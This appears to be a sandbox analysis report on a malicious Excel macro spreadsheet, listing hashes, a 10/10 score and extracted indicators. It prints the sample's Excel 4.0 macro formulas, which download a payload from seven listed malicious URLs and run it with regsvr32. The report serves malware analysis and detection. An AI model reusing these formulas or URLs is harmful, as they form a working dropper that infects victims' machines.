Overview

overview

10

Static

static

10

fe5e4266a2...5.xlsm

windows7-x64

10

fe5e4266a2...5.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    fe5e4266a2b3abaf523cfeb95a71f58419e76b3b4c80284b472519cbd76488e5

  • Size

    38KB

  • Sample

    241120-mq78gavrht

  • MD5

    60b9d4bf614da158627661e07d0c7bc6

  • SHA1

    b9b314f0659e0d609331cf660da8a9b2b12bb77f

  • SHA256

    fe5e4266a2b3abaf523cfeb95a71f58419e76b3b4c80284b472519cbd76488e5

  • SHA512

    e1141fa3cf2974b685c4be45a93640c3e63ea0f3d9df735c0f270ec4e88b0280ea4c545aebcdcc2c1a3bb8d075acabde459d98c21de4e8de53c3d1770047d458

  • SSDEEP

    768:idUCR8xZ5jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIy5:a5wXOZZ1ZYpoQ/pMAeVIyMId

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://ausnz.net/2010wc/RhAYVPNypjphNNk6J/

https://belisip.net/libs/Swift-5.1.0/F5XU7EuPePQ/

https://blog.centerking.top/wp-includes/WEIuPafz0bS/

https://edu-media.cn/wp-admin/TOu/

https://ppiabanyuwangi.or.id/lulu-1937/daURDNUyso/

https://lydt.cc/wp-includes/jprpcO8U/

https://acerestoration.co.za/wp-admin/gJqMBYhQHYsDE/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ausnz.net/2010wc/RhAYVPNypjphNNk6J/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://belisip.net/libs/Swift-5.1.0/F5XU7EuPePQ/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://blog.centerking.top/wp-includes/WEIuPafz0bS/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://edu-media.cn/wp-admin/TOu/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ppiabanyuwangi.or.id/lulu-1937/daURDNUyso/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lydt.cc/wp-includes/jprpcO8U/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://acerestoration.co.za/wp-admin/gJqMBYhQHYsDE/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://ausnz.net/2010wc/RhAYVPNypjphNNk6J/
xlm40.dropper

https://belisip.net/libs/Swift-5.1.0/F5XU7EuPePQ/
xlm40.dropper

https://blog.centerking.top/wp-includes/WEIuPafz0bS/
xlm40.dropper

https://edu-media.cn/wp-admin/TOu/
xlm40.dropper

https://ppiabanyuwangi.or.id/lulu-1937/daURDNUyso/

Targets

    • Target

      fe5e4266a2b3abaf523cfeb95a71f58419e76b3b4c80284b472519cbd76488e5

    • Size

      38KB

    • MD5

      60b9d4bf614da158627661e07d0c7bc6

    • SHA1

      b9b314f0659e0d609331cf660da8a9b2b12bb77f

    • SHA256

      fe5e4266a2b3abaf523cfeb95a71f58419e76b3b4c80284b472519cbd76488e5

    • SHA512

      e1141fa3cf2974b685c4be45a93640c3e63ea0f3d9df735c0f270ec4e88b0280ea4c545aebcdcc2c1a3bb8d075acabde459d98c21de4e8de53c3d1770047d458

    • SSDEEP

      768:idUCR8xZ5jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIy5:a5wXOZZ1ZYpoQ/pMAeVIyMId

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks